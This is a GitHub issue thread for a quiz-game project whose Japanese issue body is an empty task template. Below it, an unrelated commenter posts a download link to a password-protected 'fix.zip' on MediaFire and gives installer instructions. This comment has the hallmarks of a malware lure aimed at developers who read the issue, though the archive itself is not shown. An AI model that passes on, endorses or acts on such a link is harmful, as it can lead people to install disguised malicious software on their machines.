### ISSUE TITLE
Mainクラスに問題表示させる

### ISSUE THREAD

**Issue by ARATA1235** [ARATA1235/quiz-game#10]
## 受入条件 
- [ ] 受入条件1
- [ ] 受入条件2 #
# タスク 
- [ ] タスク1
- [ ] タスク2
## その他

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
